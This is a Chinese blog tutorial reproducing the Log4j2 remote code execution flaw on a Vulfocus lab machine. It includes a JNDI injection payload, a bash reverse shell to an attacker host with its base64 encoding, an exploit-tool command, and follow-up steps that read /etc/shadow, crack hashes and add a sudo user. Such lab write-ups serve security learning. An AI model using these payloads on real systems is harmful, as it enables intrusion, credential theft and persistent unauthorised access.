相关阅读
之前其实有粉丝发表过Log4j漏洞复现的教程,我们今天做一个补充,感兴趣可以继续阅读!包含POC和EXP
准备工作
- 靶场虚拟机 CentOS
192.168.10.215
用来部署vulfocus的log4j2漏洞 - 攻击客户端 Ubuntu
192.168.10.217
用来执行RCE 远程控制靶场机器
靶场部署
参考我们之前的文章,使用Docker方式部署Vulfocus
下载并启动镜像
这里确认您已经通过Docker部署完Vulfocus,并已登录(默认密码admin/admin)
在vulfocus后台下载vulfocus/log4j2-rce-2021-12-09:latest
镜像
![图片[1]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120124129206-1024x326.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后在首页启动该镜像
![图片[2]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120124256730-1024x510.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
![图片[3]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135530478.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
复现过程
任务一:dnslog回显
先在http://www.dnslog.cn/获取一个域名,用来测试是否正常回显
![图片[4]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135552576-1024x307.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这个q98csp.dnslog.cn是我们获取到的域名,一会儿用来验证是否有回显
我们访问目标页面,正常的请求是
http://192.168.10.215:12219/hello?payload=111
![图片[5]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142811889.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这时我们打开BurpSuite并用浏览器的FoxyProxy插件设置好抓包的代理模式
![图片[6]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120135650563-1024x132.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们使用BurpSuite抓包,将其发送到重放模块中
![图片[7]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142925808-1024x591.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后修改payload参数,提交
payload=${jndi:ldap://q98csp.dnslog.cn}
![图片[8]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120142956217-1024x641.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这时发现返回值是400
![图片[9]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143126552-1024x715.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们尝试通过URL编码,这里注意仅对payload=后面的部分进行编码,否则会注入失败
![图片[10]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143133624-1024x778.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后提交
![图片[11]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143201755-1024x709.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这里看到返回值是200,说明提交成功了
![图片[12]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143220869-1024x572.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这时回到http://www.dnslog.cn/页面,点击Refresh Record
刷新记录
![图片[13]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143324174-1024x300.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
发现回显成功了,这里已经能看到IP地址了,因此我们确认了刚才的提交确实存在Log4j2的漏洞
![图片[14]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120143341669-1024x314.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
任务二:RCE远程命令执行
接下来我们将完成漏洞的利用,我们通过Log4j2的漏洞可以尝试对服务器进行远程控制,主要核心还是反弹shell,我们之前讲过,详细原理参考这个视频
我们先新建个终端,开启4444端口监听
ncat -lvvp 4444
![图片[15]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150100931.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
通过反弹Shell在线生成工具生成shell,来进行反弹shell
![图片[16]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145216903-1024x683.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
bash -i >& /dev/tcp/192.168.10.217/4444 0>&1
然后将其转换为base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIxNy80NDQ0IDA+JjE=
![图片[17]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145427119.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后配合我们的JNDI注入工具,相关命令如下
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIxNy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.10.217
上传好JNDI注入工具( JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar )然后使用终端运行上面的命令
![图片[18]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145647804-1024x193.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
复制rmi://192.168.10.217:1099/6icmea
然后将其填入payload参数中
![图片[19]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145919778-1024x703.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后对payload=后面的部分进行url编码
![图片[20]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145946110-1024x769.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后提交
![图片[21]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120145955406-1024x708.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们发现这里貌似在建立连接了
![图片[22]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150147347-1024x505.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后进入最开始4444端口监听的终端,我们发现居然连上了192.168.10.215
的虚拟机了
![图片[23]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150355216.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们,cd ../tmp就可以找到flags了
![图片[24]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150613995.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
![图片[25]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150619334.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后通关了
![图片[26]-【vulfocus靶场】log4j2 rce复现(vulfocus/log4j2-rce-2021-12-09)-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220120150639757.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
当然你如果到了远程连接这一步,其实还可以做很多,我们之前整理过一些常见的命令
- 获取系统账户信息(
cat /etc/shadow
)
拿到账户名和加密的密码后,使用我们之前讲的hashcat可以进行破解
- 添加用户(
useradd -m 用户名
) - 提升用户权限(
usermod -G sudo 用户名
)
相关工具汇总
- dns回显在线网站 http://www.dnslog.cn/
- 反弹shell在线生成工具 https://www.iculture.cc/rce/
- JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar https://pan.iculture.cc/s/kgjIk
暂无评论内容